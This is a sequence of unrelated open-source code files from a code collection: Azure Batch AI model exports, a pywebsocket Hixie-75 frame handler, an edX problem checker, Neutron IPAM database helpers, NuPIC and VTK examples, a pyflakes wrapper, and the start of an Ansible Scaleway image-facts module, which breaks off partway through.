from ._models import AzureFileShareReference # type: ignore
from ._models import AzureStorageCredentialsInfo # type: ignore
from ._models import BatchAIError # type: ignore
from ._models import CNTKsettings # type: ignore
from ._models import Caffe2Settings # type: ignore
from ._models import CaffeSettings # type: ignore
from ._models import ChainerSettings # type: ignore
from ._models import CloudErrorBody # type: ignore
from ._models import Cluster # type: ignore
from ._models import ClusterCreateParameters # type: ignore
from ._models import ClusterListResult # type: ignore
from ._models import ClusterUpdateParameters # type: ignore
from ._models import ClustersListByWorkspaceOptions # type: ignore
from ._models import ContainerSettings # type: ignore
from ._models import CustomMpiSettings # type: ignore
from ._models import CustomToolkitSettings # type: ignore
from ._models import DataDisks # type: ignore
from ._models import EnvironmentVariable # type: ignore
from ._models import EnvironmentVariableWithSecretValue # type: ignore
from ._models import Experiment # type: ignore
from ._models import ExperimentListResult # type: ignore
from ._models import ExperimentsListByWorkspaceOptions # type: ignore
from ._models import File # type: ignore
from ._models import FileListResult # type: ignore
from ._models import FileServer # type: ignore
from ._models import FileServerCreateParameters # type: ignore
from ._models import FileServerListResult # type: ignore
from ._models import FileServerReference # type: ignore
from ._models import FileServersListByWorkspaceOptions # type: ignore
from ._models import HorovodSettings # type: ignore
from ._models import ImageReference # type: ignore
from ._models import ImageSourceRegistry # type: ignore
from ._models import InputDirectory # type: ignore
from ._models import Job # type: ignore
from ._models import JobBasePropertiesConstraints # type: ignore
from ._models import JobCreateParameters # type: ignore
from ._models import JobListResult # type: ignore
from ._models import JobPreparation # type: ignore
from ._models import JobPropertiesConstraints # type: ignore
from ._models import JobPropertiesExecutionInfo # type: ignore
from ._models import JobsListByExperimentOptions # type: ignore
from ._models import JobsListOutputFilesOptions # type: ignore
from ._models import KeyVaultSecretReference # type: ignore
from ._models import ListUsagesResult # type: ignore
from ._models import ManualScaleSettings # type: ignore
from ._models import MountSettings # type: ignore
from ._models import MountVolumes # type: ignore
from ._models import NameValuePair # type: ignore
from ._models import NodeSetup # type: ignore
from ._models import NodeStateCounts # type: ignore
from ._models import Operation # type: ignore
from ._models import OperationDisplay # type: ignore
from ._models import OperationListResult # type: ignore
from ._models import OutputDirectory # type: ignore
from ._models import PerformanceCountersSettings # type: ignore
from ._models import PrivateRegistryCredentials # type: ignore
from ._models import ProxyResource # type: ignore
from ._models import PyTorchSettings # type: ignore
from ._models import RemoteLoginInformation # type: ignore
from ._models import RemoteLoginInformationListResult # type: ignore
from ._models import Resource # type: ignore
from ._models import ResourceId # type: ignore
from ._models import ScaleSettings # type: ignore
from ._models import SetupTask # type: ignore
from ._models import SshConfiguration # type: ignore
from ._models import TensorFlowSettings # type: ignore
from ._models import UnmanagedFileSystemReference # type: ignore
from ._models import Usage # type: ignore
from ._models import UsageName # type: ignore
from ._models import UserAccountSettings # type: ignore
from ._models import VirtualMachineConfiguration # type: ignore
from ._models import Workspace # type: ignore
from ._models import WorkspaceCreateParameters # type: ignore
from ._models import WorkspaceListResult # type: ignore
from ._models import WorkspaceUpdateParameters # type: ignore
from ._models import WorkspacesListByResourceGroupOptions # type: ignore
from ._models import WorkspacesListOptions # type: ignore
from ._batch_ai_enums import (
AllocationState,
CachingType,
DeallocationOption,
ExecutionState,
FileServerProvisioningState,
FileType,
JobPriority,
ProvisioningState,
StorageAccountType,
ToolType,
UsageUnit,
VmPriority,
)
__all__ = [
'AppInsightsReference',
'AutoScaleSettings',
'AzureBlobFileSystemReference',
'AzureFileShareReference',
'AzureStorageCredentialsInfo',
'BatchAIError',
'CNTKsettings',
'Caffe2Settings',
'CaffeSettings',
'ChainerSettings',
'CloudErrorBody',
'Cluster',
'ClusterCreateParameters',
'ClusterListResult',
'ClusterUpdateParameters',
'ClustersListByWorkspaceOptions',
'ContainerSettings',
'CustomMpiSettings',
'CustomToolkitSettings',
'DataDisks',
'EnvironmentVariable',
'EnvironmentVariableWithSecretValue',
'Experiment',
'ExperimentListResult',
'ExperimentsListByWorkspaceOptions',
'File',
'FileListResult',
'FileServer',
'FileServerCreateParameters',
'FileServerListResult',
'FileServerReference',
'FileServersListByWorkspaceOptions',
'HorovodSettings',
'ImageReference',
'ImageSourceRegistry',
'InputDirectory',
'Job',
'JobBasePropertiesConstraints',
'JobCreateParameters',
'JobListResult',
'JobPreparation',
'JobPropertiesConstraints',
'JobPropertiesExecutionInfo',
'JobsListByExperimentOptions',
'JobsListOutputFilesOptions',
'KeyVaultSecretReference',
'ListUsagesResult',
'ManualScaleSettings',
'MountSettings',
'MountVolumes',
'NameValuePair',
'NodeSetup',
'NodeStateCounts',
'Operation',
'OperationDisplay',
'OperationListResult',
'OutputDirectory',
'PerformanceCountersSettings',
'PrivateRegistryCredentials',
'ProxyResource',
'PyTorchSettings',
'RemoteLoginInformation',
'RemoteLoginInformationListResult',
'Resource',
'ResourceId',
'ScaleSettings',
'SetupTask',
'SshConfiguration',
'TensorFlowSettings',
'UnmanagedFileSystemReference',
'Usage',
'UsageName',
'UserAccountSettings',
'VirtualMachineConfiguration',
'Workspace',
'WorkspaceCreateParameters',
'WorkspaceListResult',
'WorkspaceUpdateParameters',
'WorkspacesListByResourceGroupOptions',
'WorkspacesListOptions',
'AllocationState',
'CachingType',
'DeallocationOption',
'ExecutionState',
'FileServerProvisioningState',
'FileType',
'JobPriority',
'ProvisioningState',
'StorageAccountType',
'ToolType',
'UsageUnit',
'VmPriority',
]
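
# An illustrative sketch of how client code typically consumes this namespace;
# the constructor arguments shown are assumptions and may not match the real
# signatures exactly:
#
#     from azure.mgmt.batchai import models
#
#     scale = models.ScaleSettings(
#         manual=models.ManualScaleSettings(target_node_count=1))
#     params = models.ClusterCreateParameters(vm_size='STANDARD_D2_V2',
#                                             scale_settings=scale)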
| mit |
autrilla/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/_stream_hixie75.py | 681 | 8842 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides a class for parsing/building frames of the WebSocket
protocol version HyBi 00 and Hixie 75.
Specification:
- HyBi 00 http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-00
- Hixie 75 http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-75
"""
from mod_pywebsocket import common
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import StreamBase
from mod_pywebsocket._stream_base import UnsupportedFrameException
from mod_pywebsocket import util
class StreamHixie75(StreamBase):
"""A class for parsing/building frames of the WebSocket protocol version
HyBi 00 and Hixie 75.
"""
def __init__(self, request, enable_closing_handshake=False):
"""Construct an instance.
Args:
request: mod_python request.
enable_closing_handshake: to let StreamHixie75 perform closing
handshake as specified in HyBi 00, set
this option to True.
"""
StreamBase.__init__(self, request)
self._logger = util.get_class_logger(self)
self._enable_closing_handshake = enable_closing_handshake
self._request.client_terminated = False
self._request.server_terminated = False
def send_message(self, message, end=True, binary=False):
"""Send message.
Args:
message: unicode string to send.
binary: not used in hixie75.
Raises:
BadOperationException: when called on a server-terminated
connection.
"""
if not end:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with end=False')
if binary:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with binary=True')
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
self._write(''.join(['\x00', message.encode('utf-8'), '\xff']))
def _read_payload_length_hixie75(self):
"""Reads a length header in a Hixie75 version frame with length.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
length = 0
while True:
b_str = self._read(1)
b = ord(b_str)
length = length * 128 + (b & 0x7f)
if (b & 0x80) == 0:
break
return length
def receive_message(self):
"""Receive a WebSocket frame and return its payload an unicode string.
Returns:
payload unicode string in a WebSocket frame.
Raises:
ConnectionTerminatedException: when read returns empty
string.
BadOperationException: when called on a client-terminated
connection.
"""
if self._request.client_terminated:
raise BadOperationException(
'Requested receive_message after receiving a closing '
'handshake')
while True:
# Read 1 byte.
# mp_conn.read will block if no bytes are available.
# Timeout is controlled by TimeOut directive of Apache.
frame_type_str = self.receive_bytes(1)
frame_type = ord(frame_type_str)
if (frame_type & 0x80) == 0x80:
# The payload length is specified in the frame.
# Read and discard.
length = self._read_payload_length_hixie75()
if length > 0:
_ = self.receive_bytes(length)
# 5.3 3. 12. if /type/ is 0xFF and /length/ is 0, then set the
# /client terminated/ flag and abort these steps.
if not self._enable_closing_handshake:
continue
if frame_type == 0xFF and length == 0:
self._request.client_terminated = True
if self._request.server_terminated:
self._logger.debug(
'Received ack for server-initiated closing '
'handshake')
return None
self._logger.debug(
'Received client-initiated closing handshake')
self._send_closing_handshake()
self._logger.debug(
'Sent ack for client-initiated closing handshake')
return None
else:
# The payload is delimited with \xff.
bytes = self._read_until('\xff')
# The WebSocket protocol section 4.4 specifies that invalid
# characters must be replaced with U+fffd REPLACEMENT
# CHARACTER.
message = bytes.decode('utf-8', 'replace')
if frame_type == 0x00:
return message
# Discard data of other types.
def _send_closing_handshake(self):
if not self._enable_closing_handshake:
raise BadOperationException(
'Closing handshake is not supported in Hixie 75 protocol')
self._request.server_terminated = True
# 5.3 the server may decide to terminate the WebSocket connection by
# running through the following steps:
# 1. send a 0xFF byte and a 0x00 byte to the client to indicate the
# start of the closing handshake.
self._write('\xff\x00')
def close_connection(self, unused_code='', unused_reason=''):
"""Closes a WebSocket connection.
Raises:
ConnectionTerminatedException: when closing handshake was
                                           not successful.
"""
if self._request.server_terminated:
self._logger.debug(
'Requested close_connection but server is already terminated')
return
if not self._enable_closing_handshake:
self._request.server_terminated = True
self._logger.debug('Connection closed')
return
self._send_closing_handshake()
self._logger.debug('Sent server-initiated closing handshake')
# TODO(ukai): 2. wait until the /client terminated/ flag has been set,
# or until a server-defined timeout expires.
#
# For now, we expect receiving closing handshake right after sending
# out closing handshake, and if we couldn't receive non-handshake
# frame, we take it as ConnectionTerminatedException.
message = self.receive_message()
if message is not None:
raise ConnectionTerminatedException(
'Didn\'t receive valid ack for closing handshake')
# TODO: 3. close the WebSocket connection.
# note: mod_python Connection (mp_conn) doesn't have close method.
def send_ping(self, body):
raise BadOperationException(
'StreamHixie75 doesn\'t support send_ping')
# vi:sts=4 sw=4 et
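
# A standalone sketch of the wire format implemented above: a text frame is
# the byte 0x00, the UTF-8 payload, then 0xFF, and the HyBi 00 closing
# handshake is the two bytes 0xFF 0x00.
def _example_encode_text_frame(message):
    return ''.join(['\x00', message.encode('utf-8'), '\xff'])


if __name__ == '__main__':
    assert _example_encode_text_frame(u'hello') == '\x00hello\xff'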
| mpl-2.0 |
halvertoluke/edx-platform | common/lib/capa/capa/checker.py | 101 | 5906 | #!/usr/bin/env python
"""
Commandline tool for doing operations on Problems
"""
from __future__ import unicode_literals
import argparse
import logging
import sys
from path import Path as path
from cStringIO import StringIO
from calc import UndefinedVariable
from capa.capa_problem import LoncapaProblem
from mako.lookup import TemplateLookup
logging.basicConfig(format="%(levelname)s %(message)s")
log = logging.getLogger('capa.checker')
class DemoSystem(object):
def __init__(self):
self.lookup = TemplateLookup(directories=[path(__file__).dirname() / 'templates'])
self.DEBUG = True
def render_template(self, template_filename, dictionary, context=None):
if context is None:
context = {}
context_dict = {}
context_dict.update(dictionary)
context_dict.update(context)
return self.lookup.get_template(template_filename).render(**context_dict)
def main():
parser = argparse.ArgumentParser(description='Check Problem Files')
parser.add_argument("command", choices=['test', 'show']) # Watch? Render? Open?
parser.add_argument("files", nargs="+", type=argparse.FileType('r'))
parser.add_argument("--seed", required=False, type=int)
parser.add_argument("--log-level", required=False, default="INFO",
choices=['info', 'debug', 'warn', 'error',
'INFO', 'DEBUG', 'WARN', 'ERROR'])
args = parser.parse_args()
log.setLevel(args.log_level.upper())
system = DemoSystem()
for problem_file in args.files:
log.info("Opening {0}".format(problem_file.name))
try:
problem = LoncapaProblem(problem_file, "fakeid", seed=args.seed, system=system)
except Exception as ex:
log.error("Could not parse file {0}".format(problem_file.name))
log.exception(ex)
continue
if args.command == 'test':
command_test(problem)
elif args.command == 'show':
command_show(problem)
problem_file.close()
# In case we want to do anything else here.
def command_show(problem):
"""Display the text for this problem"""
print problem.get_html()
def command_test(problem):
# We're going to trap stdout/stderr from the problems (yes, some print)
old_stdout, old_stderr = sys.stdout, sys.stderr
try:
sys.stdout = StringIO()
sys.stderr = StringIO()
check_that_suggested_answers_work(problem)
check_that_blanks_fail(problem)
log_captured_output(sys.stdout,
"captured stdout from {0}".format(problem))
log_captured_output(sys.stderr,
"captured stderr from {0}".format(problem))
except Exception as e:
log.exception(e)
finally:
sys.stdout, sys.stderr = old_stdout, old_stderr
def check_that_blanks_fail(problem):
"""Leaving it blank should never work. Neither should a space."""
blank_answers = dict((answer_id, u"")
for answer_id in problem.get_question_answers())
grading_results = problem.grade_answers(blank_answers)
try:
assert all(result == 'incorrect' for result in grading_results.values())
except AssertionError:
log.error("Blank accepted as correct answer in {0} for {1}"
.format(problem,
[answer_id for answer_id, result
in sorted(grading_results.items())
if result != 'incorrect']))
def check_that_suggested_answers_work(problem):
"""Split this up so that we're only used for formula/numeric answers.
Examples of where this fails:
* Displayed answers use units but acceptable ones do not.
- L1e0.xml
- Presents itself as UndefinedVariable (when it tries to pass to calc)
* "a or d" is what's displayed, but only "a" or "d" is accepted, not the
string "a or d".
- L1-e00.xml
"""
# These are actual answers we get from the responsetypes
real_answers = problem.get_question_answers()
# all_answers is real_answers + blanks for other answer_ids for which the
# responsetypes can't provide us pre-canned answers (customresponse)
all_answer_ids = problem.get_answer_ids()
all_answers = dict((answer_id, real_answers.get(answer_id, ""))
for answer_id in all_answer_ids)
log.debug("Real answers: {0}".format(real_answers))
if real_answers:
try:
real_results = dict((answer_id, result) for answer_id, result
in problem.grade_answers(all_answers).items()
if answer_id in real_answers)
log.debug(real_results)
assert(all(result == 'correct'
for answer_id, result in real_results.items()))
except UndefinedVariable as uv_exc:
log.error("The variable \"{0}\" specified in the ".format(uv_exc) +
"solution isn't recognized (is it a units measure?).")
except AssertionError:
log.error("The following generated answers were not accepted for {0}:"
.format(problem))
for question_id, result in sorted(real_results.items()):
if result != 'correct':
log.error(" {0} = {1}".format(question_id, real_answers[question_id]))
except Exception as ex:
log.error("Uncaught error in {0}".format(problem))
log.exception(ex)
def log_captured_output(output_stream, stream_name):
output_stream.seek(0)
output_text = output_stream.read()
if output_text:
log.info("##### Begin {0} #####\n".format(stream_name) + output_text)
log.info("##### End {0} #####".format(stream_name))
if __name__ == '__main__':
sys.exit(main())
| agpl-3.0 |
jacknjzhou/neutron | neutron/ipam/drivers/neutrondb_ipam/db_api.py | 22 | 8761 | # Copyright 2015 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from oslo_utils import uuidutils
from neutron.ipam.drivers.neutrondb_ipam import db_models
LOG = log.getLogger(__name__)
# Database operations for Neutron's DB-backed IPAM driver
class IpamSubnetManager(object):
@classmethod
def load_by_neutron_subnet_id(cls, session, neutron_subnet_id):
return session.query(db_models.IpamSubnet).filter_by(
neutron_subnet_id=neutron_subnet_id).first()
def __init__(self, ipam_subnet_id, neutron_subnet_id):
self._ipam_subnet_id = ipam_subnet_id
self._neutron_subnet_id = neutron_subnet_id
@property
def neutron_id(self):
return self._neutron_subnet_id
def create(self, session):
"""Create database models for an IPAM subnet.
This method creates a subnet resource for the IPAM driver and
associates it with its neutron identifier, if specified.
        :param session: database session.
        :returns: the identifier of the created IPAM subnet
"""
if not self._ipam_subnet_id:
self._ipam_subnet_id = uuidutils.generate_uuid()
ipam_subnet = db_models.IpamSubnet(
id=self._ipam_subnet_id,
neutron_subnet_id=self._neutron_subnet_id)
session.add(ipam_subnet)
return self._ipam_subnet_id
@classmethod
def delete(cls, session, neutron_subnet_id):
"""Delete IPAM subnet.
        The IPAM subnet no longer has a foreign key to the neutron subnet,
        so the delete has to be performed manually.
        :param session: database session
:param neutron_subnet_id: neutron subnet id associated with ipam subnet
"""
return session.query(db_models.IpamSubnet).filter_by(
neutron_subnet_id=neutron_subnet_id).delete()
def create_pool(self, session, pool_start, pool_end):
"""Create an allocation pool and availability ranges for the subnet.
        This method does not perform any validation on parameters; it simply
        persists data in the database.
:param pool_start: string expressing the start of the pool
:param pool_end: string expressing the end of the pool
:return: the newly created pool object.
"""
ip_pool = db_models.IpamAllocationPool(
ipam_subnet_id=self._ipam_subnet_id,
first_ip=pool_start,
last_ip=pool_end)
session.add(ip_pool)
ip_range = db_models.IpamAvailabilityRange(
allocation_pool=ip_pool,
first_ip=pool_start,
last_ip=pool_end)
session.add(ip_range)
return ip_pool
def delete_allocation_pools(self, session):
"""Remove all allocation pools for the current subnet.
:param session: database session
"""
session.query(db_models.IpamAllocationPool).filter_by(
ipam_subnet_id=self._ipam_subnet_id).delete()
def list_pools(self, session):
"""Return pools for the current subnet."""
return session.query(
db_models.IpamAllocationPool).filter_by(
ipam_subnet_id=self._ipam_subnet_id)
def _range_query(self, session, locking):
range_qry = session.query(
db_models.IpamAvailabilityRange).join(
db_models.IpamAllocationPool).filter_by(
ipam_subnet_id=self._ipam_subnet_id)
if locking:
range_qry = range_qry.with_lockmode('update')
return range_qry
def get_first_range(self, session, locking=False):
"""Return the first availability range for the subnet
:param session: database session
:param locking: specifies whether a write-intent lock should be
performed on the database operation
:return: first available range as instance of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
return self._range_query(session, locking).first()
def list_ranges_by_subnet_id(self, session, locking=False):
"""Return availability ranges for a given ipam subnet
:param session: database session
:param locking: specifies whether a write-intent lock should be
acquired with this database operation.
:return: list of availability ranges as instances of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
return self._range_query(session, locking)
def list_ranges_by_allocation_pool(self, session, allocation_pool_id,
locking=False):
"""Return availability ranges for a given pool.
:param session: database session
:param allocation_pool_id: allocation pool identifier
:param locking: specifies whether a write-intent lock should be
acquired with this database operation.
:return: list of availability ranges as instances of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
return session.query(
db_models.IpamAvailabilityRange).join(
db_models.IpamAllocationPool).filter_by(
id=allocation_pool_id)
def create_range(self, session, allocation_pool_id,
range_start, range_end):
"""Create an availabilty range for a given pool.
This method does not perform any validation on parameters; it simply
persist data on the database.
:param session: database session
:param allocation_pool_id: allocation pool identifier
:param range_start: first ip address in the range
:param range_end: last ip address in the range
:return: the newly created availability range as an instance of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
new_ip_range = db_models.IpamAvailabilityRange(
allocation_pool_id=allocation_pool_id,
first_ip=range_start,
last_ip=range_end)
session.add(new_ip_range)
return new_ip_range
def check_unique_allocation(self, session, ip_address):
"""Validate that the IP address on the subnet is not in use."""
iprequest = session.query(db_models.IpamAllocation).filter_by(
ipam_subnet_id=self._ipam_subnet_id, status='ALLOCATED',
ip_address=ip_address).first()
if iprequest:
return False
return True
def list_allocations(self, session, status='ALLOCATED', locking=False):
"""Return current allocations for the subnet.
:param session: database session
:param status: IP allocation status
:param locking: specifies whether a write-intent lock should be
performed on the database operation
:returns: a list of IP allocation as instance of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAllocation
"""
ip_qry = session.query(
db_models.IpamAllocation).filter_by(
ipam_subnet_id=self._ipam_subnet_id,
status=status)
if locking:
ip_qry = ip_qry.with_lockmode('update')
return ip_qry
def create_allocation(self, session, ip_address,
status='ALLOCATED'):
"""Create an IP allocation entry.
:param session: database session
:param ip_address: the IP address to allocate
:param status: IP allocation status
"""
ip_request = db_models.IpamAllocation(
ip_address=ip_address,
status=status,
ipam_subnet_id=self._ipam_subnet_id)
session.add(ip_request)
def delete_allocation(self, session, ip_address):
"""Remove an IP allocation for this subnet.
:param session: database session
:param ip_address: IP address for which the allocation entry should
be removed.
"""
return session.query(db_models.IpamAllocation).filter_by(
ip_address=ip_address,
ipam_subnet_id=self._ipam_subnet_id).delete(
synchronize_session=False)
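# Illustrative usage sketch (comment only, not part of the driver): the names
# `session` and `neutron_subnet_id` below are hypothetical stand-ins for a
# SQLAlchemy session and a neutron subnet identifier.
#
#     manager = IpamSubnetManager(ipam_subnet_id=None,
#                                 neutron_subnet_id=neutron_subnet_id)
#     ipam_subnet_id = manager.create(session)
#     manager.create_pool(session, '192.168.0.2', '192.168.0.254')
#     if manager.check_unique_allocation(session, '192.168.0.10'):
#         manager.create_allocation(session, '192.168.0.10')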
| apache-2.0 |
gamahead/nupic | examples/opf/experiments/classification/scalar_TP_0/description.py | 17 | 1684 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'claEvalClassification': True,
'dataSource': 'file://' + os.path.join(os.path.dirname(__file__),
'../datasets/scalar_TP_0.csv'),
'modelParams': { 'clParams': { 'clVerbosity': 0},
'sensorParams': { 'encoders': { }, 'verbosity': 0},
'spParams': { },
'tpEnable': True,
'tpParams': { }}}
mod = importBaseDescription('../base_scalar/description.py', config)
locals().update(mod.__dict__)
| gpl-3.0 |
davidt/reviewboard | contrib/internal/run-pyflakes.py | 10 | 1740 | #!/usr/bin/env python
#
# Utility script to run pyflakes with the modules we care about and
# exclude errors we know to be fine.
from __future__ import print_function, unicode_literals
import os
import re
import subprocess
import sys
module_exclusions = (
'build',
'djblets',
'django_evolution',
'dist',
'ez_setup.py',
'fabfile.py',
'settings_local.py',
'reviewboard/htdocs',
'ReviewBoard.egg-info',
)
def scan_for_modules():
return [entry
for entry in os.listdir(os.getcwd())
if ((os.path.isdir(entry) or entry.endswith(".py")) and
entry not in module_exclusions)]
def main():
cur_dir = os.path.dirname(__file__)
os.chdir(os.path.join(cur_dir, "..", ".."))
modules = sys.argv[1:]
if not modules:
# The user didn't specify anything specific. Scan for modules.
modules = scan_for_modules()
p = subprocess.Popen(['pyflakes'] + modules,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
close_fds=True)
contents = p.stdout.readlines()
# Read in the exclusions file
exclusions = {}
with open(os.path.join(cur_dir, "pyflakes.exclude"), "r") as fp:
for line in fp:
if not line.startswith("#"):
exclusions[line.rstrip()] = 1
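    # A hypothetical pyflakes.exclude entry mirrors a pyflakes warning with the
    # line number replaced by '*', matching the normalization applied below,
    # e.g.:
    #   reviewboard/foo.py:*: 'bar' imported but unused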
# Now filter things
for line in contents:
line = line.rstrip()
test_line = re.sub(r':[0-9]+:', r':*:', line, 1)
test_line = re.sub(r'line [0-9]+', r'line *', test_line)
if (test_line not in exclusions and
not test_line.startswith(module_exclusions)):
print(line)
if __name__ == "__main__":
main()
| mit |
Wuteyan/VTK | Examples/ImageProcessing/Python/Contours2D.py | 15 | 2351 | #!/usr/bin/env python
# This example shows how to sample a mathematical function over a
# volume. A slice from the volume is then extracted and then contoured
# to produce 2D contour lines.
#
import vtk
# Quadric definition. This is a type of implicit function. Here the
# coefficients to the equations are set.
quadric = vtk.vtkQuadric()
quadric.SetCoefficients(.5, 1, .2, 0, .1, 0, 0, .2, 0, 0)
# The vtkSampleFunction uses the quadric function and evaluates function
# value over a regular lattice (i.e., a volume).
sample = vtk.vtkSampleFunction()
sample.SetSampleDimensions(30, 30, 30)
sample.SetImplicitFunction(quadric)
sample.ComputeNormalsOff()
sample.Update()
# Here a single slice (i.e., image) is extracted from the volume. (Note: in
# actuality the VOI request causes the sample function to operate on just the
# slice.)
extract = vtk.vtkExtractVOI()
extract.SetInputConnection(sample.GetOutputPort())
extract.SetVOI(0, 29, 0, 29, 15, 15)
extract.SetSampleRate(1, 2, 3)
# The image is contoured to produce contour lines. Thirteen contour values
# ranging from (0,1.2) inclusive are produced.
contours = vtk.vtkContourFilter()
contours.SetInputConnection(extract.GetOutputPort())
contours.GenerateValues(13, 0.0, 1.2)
# The contour lines are mapped to the graphics library.
contMapper = vtk.vtkPolyDataMapper()
contMapper.SetInputConnection(contours.GetOutputPort())
contMapper.SetScalarRange(0.0, 1.2)
contActor = vtk.vtkActor()
contActor.SetMapper(contMapper)
# Create an outline of the sampled data.
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(sample.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0, 0, 0)
# Create the renderer, render window, and interactor.
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Set the background color to white. Associate the actors with the
# renderer.
ren.SetBackground(1, 1, 1)
ren.AddActor(contActor)
ren.AddActor(outlineActor)
# Zoom in a little bit.
ren.ResetCamera()
ren.GetActiveCamera().Zoom(1.5)
# Initialize and start the event loop.
iren.Initialize()
renWin.Render()
iren.Start()
| bsd-3-clause |
tchernomax/ansible | lib/ansible/modules/cloud/scaleway/scaleway_image_facts.py | 53 | 3563 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, Yanis Guenane <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: scaleway_image_facts
short_description: Gather facts about the Scaleway images available.
description:
- Gather facts about the Scaleway images available.
version_added: "2.7"
author:
- "Yanis Guenane (@Spredzy)"
- "Remy Leone (@sieben)"
extends_documentation_fragment: scaleway
options:
region:
version_added: "2.7"
description:
- Scaleway compute zone
required: true
choices:
- ams1
- EMEA-NL-EVS
- par1
- EMEA-FR-PAR1
'''
EXAMPLES = r'''
- name: Gather Scaleway images facts
scaleway_image_facts:
region: par1
'''
RETURN = r'''
---
scaleway_image_facts:
description: Response from Scaleway API
returned: success
type: complex
contains:
"scaleway_image_facts": [
{
"arch": "x86_64",
"creation_date": "2018-07-17T16:18:49.276456+00:00",
"default_bootscript": {
"architecture": "x86_64",
"bootcmdargs": "LINUX_COMMON scaleway boot=local nbd.max_part=16",
"default": false,
"dtb": "",
"id": "15fbd2f7-a0f9-412b-8502-6a44da8d98b8",
"initrd": "http://169.254.42.24/initrd/initrd-Linux-x86_64-v3.14.5.gz",
"kernel": "http://169.254.42.24/kernel/x86_64-mainline-lts-4.9-4.9.93-rev1/vmlinuz-4.9.93",
"organization": "11111111-1111-4111-8111-111111111111",
"public": true,
"title": "x86_64 mainline 4.9.93 rev1"
},
"extra_volumes": [],
"from_server": null,
"id": "00ae4a88-3252-4eda-9feb-5f6b56bf5ef0",
"modification_date": "2018-07-17T16:42:06.319315+00:00",
"name": "Debian Stretch",
"organization": "51b656e3-4865-41e8-adbc-0c45bdd780db",
"public": true,
"root_volume": {
"id": "da32dfbb-c5ff-476d-ae2d-c297dd09b7dd",
"name": "snapshot-2a7229dc-d431-4dc5-b66e-95db08b773af-2018-07-17_16:18",
"size": 25000000000,
"volume_type": "l_ssd"
},
"state": "available"
}
]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.scaleway import (
